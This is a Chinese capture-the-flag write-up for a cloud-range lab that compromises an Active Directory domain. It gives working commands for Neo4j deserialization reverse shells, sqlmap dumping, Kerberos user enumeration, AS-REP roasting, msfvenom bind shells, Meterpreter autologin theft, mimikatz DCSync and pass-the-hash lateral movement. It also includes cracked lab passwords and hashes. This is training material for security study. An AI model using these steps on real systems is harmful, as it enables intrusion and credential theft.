首页 > 其他分享 >春秋云境 Time WP

春秋云境 Time WP

时间:2023-12-17 19:47:21浏览次数:24  
标签:__ 6.12 WP 用户 lab 云境 Time open 172.22

春秋云境 Time WP

flag01

首先fscan扫描,发现开放7687端口。

image-20231217125139735

猜测为neo4j,Neo4j是一个开源图数据库管理系统。

在Neo4j 3.4.18及以前,如果开启了Neo4j Shell接口,攻击者将可以通过RMI协议以未授权的身份调用任意方法,其中setSessionVariable方法存在反序列化漏洞。因为这个漏洞并非RMI反序列化,所以不受到Java版本的影响。在Neo4j 3.5及之后的版本,Neo4j Shell被Cyber Shell替代。

查找相关文章,找到:CVE-2021-34371 Neo4j Shell Server 反序列化漏洞复现 – Zgao's blog,进行复现,反弹shell,注意命令要base64编码,在线编码网站:Runtime.exec Payload Generater | AresX's Blog (ares-x.com)

image-20231217125157975

image-20231217130732325

image-20231217130749255

反弹到shell之后拿到flag:flag{8ee7dfae-4958-4ab7-94e9-aa5101c0e442}

image-20231217131127817

flag02

先看一下网卡,然后上传fscan进行扫描

image-20231217131330291

neo4j@ubuntu:~$ ./fscan -h 172.22.6.0/24
./fscan -h 172.22.6.0/24

___                              _

  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.3
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.6.12     is alive
(icmp) Target 172.22.6.38     is alive   
(icmp) Target 172.22.6.36     is alive   
(icmp) Target 172.22.6.25     is alive   
[*] Icmp alive hosts len is: 4
172.22.6.25:445 open
172.22.6.12:445 open
172.22.6.25:139 open
172.22.6.12:139 open
172.22.6.25:135 open
172.22.6.12:135 open
172.22.6.36:22 open
172.22.6.38:80 open
172.22.6.38:22 open
172.22.6.12:88 open
172.22.6.36:7687 open
[*] alive ports len is: 11
start vulscan
[*] NetInfo 
[*]172.22.6.12
   [->]DC-PROGAME
   [->]172.22.6.12
[*] NetBios 172.22.6.25     XIAORANG\WIN2019              
[*] OsInfo 172.22.6.12	(Windows Server 2016 Datacenter 14393)
[*] NetInfo 
[*]172.22.6.25
   [->]WIN2019
   [->]172.22.6.25
[*] NetBios 172.22.6.12     [+] DC:DC-PROGAME.xiaorang.lab       Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.6.38        code:200 len:1531   title:后台登录
[*] WebTitle https://172.22.6.36:7687  code:400 len:50     title:None

先看 172.22.6.38 的web站点

image-20231217134323075

加单引号卡住,尝试sqlmap跑注入

image-20231217134457561

在数据库中发现flag:

python sqlmap.py -r 1.txt -D oa_db -T oa_f1Agggg -C flag02 --dump

flag{b142f5ce-d9b8-4b73-9012-ad75175ba029}

image-20231217135511252

flag03

oa_admin下有password: bo2y8kAL3HnXUiQo,但是登录web页面什么都没有

oa_users 有email列,dump出来,拿到oa_users.txt,进行域用户枚举。

域用户枚举:
kerberos的AS-REQ认证中当cname值中的用户不存在时返回包提示KDC_ERR_C_PRINCIPAL_UNKNOWN,所以当我们没有域凭证时,可以通过Kerberos pre-auth从域外对域用户进行用户枚举。

./kerbrute_linux_amd64 userenum --dc 172.22.6.12 -d xiaorang.lab oa_users.txt

image-20231217143658258

将枚举出来的用户做成字典users.txt。

然后进行AS_REP Roasting攻击:
AS_REP Roasting是一种对用户账户进行离线爆破的方式,需要关闭预身份验证,而此选项又是默认开启的,所以有一定的限制,默认开启的预身份验证是会记录密码错误次数来防止爆破的,关闭预身份验证后,在进行AS_REQ之后的时候,KDC不会进行任何验证就将TGT和用该用户Hash加密的Login Session Key返回,由于AS_REP的数据包中Login Session Key的是由用户Hash进行加密的,因此,可以对获取到的用户Hash加密的Login Session Key进行离线爆破,得到对应用户的明文密码
对于域用户,如果设置了选项Do not require Kerberos preauthentication(不要求Kerberos预身份认证),此时向域控制器的88端口发送AS-REQ请求,对收到的AS-REP内容重新组合,能够拼接成”Kerberos 5 AS-REP etype 23”(18200)的格式,接下来可以使用hashcat或是john对其破解,最终获得该用户的明文口令

image-20231217145231321

得到2个用户

[email protected]@XIAORANG.LAB:1ed2db49f5da8fd30b8d754a531f0e64$f2561fd94421d0e0db6deaf5fd03c28e018483a73ce0c4457e2605ec46ce04c634630327b8fd8f4d397a7df7dff62f7c2371343a698bc65dc9a3841499199c025c6d0345083ae296844b128e76e8ece3db687feaf29316c7d17c698f99e60ca565d2a83d7d950649c66cc08d5b6cd3c78e9c76f4360667c0105f0c5f928155c208f5a3bb230fd35d548c52f9845784f8c15faa1251345a604d30878ddae526b16c7cd8e1f744c4083680509e1a426003ad7de35a58820ff3f046f001b57dfdfd4fe165e5339904335350ff9ebf540dd25c69eec015768b3934815a87272c30a4d1d69ce9afc7ea38341339f4
[email protected]@XIAORANG.LAB:7e97bdebe4cdf7ff14b398f0bf1b3855$71100918a48f492e49148efcfe39850868447df4e9a95d38e8c479e296f6e3cbbe462690e0e98dec9029cc101f985b9bf6f0423e71b63a475e5ff207110a8fbe361da24eac2cf7a3062b245290941e5167954ebbd579fe98be31a112a4f4a8bfdc23732084e80d71dcae61d0624075e01d0a66e85ce41334ebf2a89a092f211b63f193ecbb897eea37165da1420840501aa0ae2c872e0d8b9887d958e95e75301a92daf8044f11bdff3708cd937edfcb9425414d6f1cc3d85327b9fae7cf71118aa625c1d08ccff1461efb607ca9a3ea0b85c0bd95f282efd5f2873d581a22f5abc72d1b395da35822e56e1c

用john破解,得到两个账户的密码

image-20231217150638087

strawberry       ([email protected]@XIAORANG.LAB)     
hellokitty       ([email protected]@XIAORANG.LAB) 

连接远程桌面

image-20231217151050348

上传bloodhound收集工具,进行域信息收集

image-20231217153714482

导入收集的zip,进行分析,我们现在在win2019,下一步要打[email protected],仔细看,线路上都有攻击的提示:HasSession

HasSession:用户与计算机时进行会话时,凭据会保留在内存中,说明yuxuan这个用户登录过WIN2019,很多用户习惯将计算机设置自动登录,可以使用MSF抓取自动登录的用户名和密码

image-20231217153652414

先生成正向shell

msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o bind_shell.exe

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 172.22.6.25
run

运行下述命令抓取密码

run windows/gather/credentials/windows_autologin

image-20231217155426125

[+] AutoAdminLogon=1, DefaultDomain=xiaorang.lab, DefaultUser=yuxuan, DefaultPassword=Yuxuan7QbrgZ3L

然后换账号重新登陆:

image-20231217155528532

这个用户是属于域管理组的,看到提示HashSIDHistory。

HasSIDHistory:用户的SID历史记录,用户在域迁移后,票据还包含着前域所在组的SID,虽然用户不属于前域,但仍拥有前域的权限。

使用yuxuan这个用户抓Administrator的哈希mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

image-20231217160442322

拿到hash 04d93ffd6f5f6e4490e0de23f240a5e9

对自己进行横向psexec.exe -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/[email protected]

image-20231217162057500

拿到flag03:flag{8d115166-65cb-49a5-bea1-a5a1415e07ba}

image-20231217162315623

flag04

利用域管理员hash和wmiexec.py直接横向dc python wmiexec.py -hashes 00000000000000000000000000000000:04d93ffd6f5f6e4490e0de23f240a5e9 [email protected]

拿到flag04:flag{128f3a76-c44b-436b-99ca-cead13b6ec18}

image-20231217162730766

标签:__,6.12,WP,用户,lab,云境,Time,open,172.22
From: https://www.cnblogs.com/fdxsec/p/17909627.html

相关文章

  • 【python常用模块之time时间模块】---时间模块(time/datetime)
    title:【python常用模块之time时间模块】---时间模块(time/datetime)date:2023-12-1716:54:06updated:2023-12-1717:00:00description:【python常用模块之time时间模块】---时间模块(time/datetime)cover:https://home.cnblogs.com/u/dream-ze/【一】时间模......
  • 赣CTF-WEB-WP
    赣CTF-WEB-WP第一次出题,✌们轻喷~~~水果忍者~出的JS小游戏签到题,看前端中的all.js文件,即可找到flag。Ez_RCe反引号命令执行preg_match("/flag|cat|tac|system|\\$|\\.|\\\\|exec|pass/i")这边过滤了许多关键字我们知道在linux中反引号``也可以执行系统命令,只不过不会回......
  • hashlib+time模块
    hashlib模块【一】什么是摘要算法Python的hashlib提供了常见的摘要算法如MD5SHA1等等。摘要算法又称哈希算法、散列算法。它通过一个函数,把任意长度的数据转换为一个长度固定的数据串(通常用16进制的字符串表示)。摘要算法就是通过摘要函数f()对任意长度的数据data计算出......
  • setTimeout是如何实现的
    setTimeout就是一个定时器,用来指定某个函数在多少毫秒之后执行。它会返回一个整数,表示定时器的编号,同时你还可以通过该编号来取消这个定时器。要了解定时器的工作原理,就得先来回顾下之前讲的事件循环系统,我们知道渲染进程中所有运行在主线程上的任务都需要先添加到消息队列,然后事件......
  • SCUCTF2023-WEB部分wp
    川大新生赛,出的确实有点水平的,通过一些渠道看了看题打了一些,有些地方还是值得学习学习的。不鸽了,先写点吧。因为他们是校园网访问,所以我这边也只能通过一些其他的方法去打,没截图....有附件能复现的尽量复现一下。主要看的是【Web】SCU新生赛个人wp及完赛感想-CSDN博客这篇blog......
  • Prime Time-02
    TimingConstrainclk3和clk4-异步clk2和clk1-同步有四个clk,所以要设置四个clk的周期latency-Netdelay,走线的延时uncertainty-clkskew和clkjitter和毛刺transition-时钟跳变的时间falsepath-PT虽然穷举了所有的path,但是并不是所有的path都需要进行......
  • Prime Time - 介绍
    PrimeTime是对timing进行分析PrimeTime使用的是STA方法进行分析工具会有更新,但是核心内容是不变的PrimeTime(introtoSTA)没有PT工具的时候,checktiming需要对于门级电路进行仿真,耗时时间长PT用于静态时序分析的工具PT工作在门级电路上静态时序分析......
  • vulnhub-wp Bsidesvancouver
    ......
  • C++ Qt开发:DateTime日期时间组件
    Qt是一个跨平台C++图形界面开发库,利用Qt可以快速开发跨平台窗体应用程序,在Qt中我们可以通过拖拽的方式将不同组件放到指定的位置,实现图形化开发极大的方便了开发效率,本章将重点介绍QDateTime日期与时间组件的常用方法及灵活运用。在Qt中,日期和时间的处理通常使用QDateTime类。......
  • RWP性能之旅-AWR实例分析
    诊断工具汇总系统级别:-TopActivity-AWRReport-ASH-ADDM-EM-ExaWatcher-OSTools-HangAnalyze-TraceEvents-SystemStateDumpSQL级别:-SQLMonitorReport-ASH-DBMS_XPLAN-EM-EXPLAINPLAN-SQLT-10053Trace-TraceEvents-SQLHealth......